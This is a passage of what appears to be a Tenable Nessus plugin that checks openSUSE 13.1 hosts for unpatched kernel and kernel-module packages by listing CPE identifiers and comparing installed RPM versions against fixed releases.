script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:hdjmod-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-xend-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-xend-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-2.639-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-debuginfo-2.639-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-debugsource-2.639-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-default-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-default-debuginfo-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 
reference:\"cloop-kmp-desktop-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-desktop-debuginfo-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-pae-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-pae-debuginfo-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-xen-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-xen-debuginfo-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-debuginfo-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-debugsource-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-devel-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-eppic-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-eppic-debuginfo-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-gcore-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-gcore-debuginfo-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-default-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-default-debuginfo-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-desktop-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-desktop-debuginfo-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-pae-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-pae-debuginfo-7.0.2_k3.11.10_25-2.16.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-xen-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-xen-debuginfo-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-debugsource-1.28-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-default-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-default-debuginfo-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-desktop-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-desktop-debuginfo-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-pae-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-pae-debuginfo-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-xen-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-xen-debuginfo-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-debuginfo-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-debugsource-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-devel-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-default-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-default-debuginfo-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-desktop-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-desktop-debuginfo-6.21.1_k3.11.10_25-2.20.1\") ) 
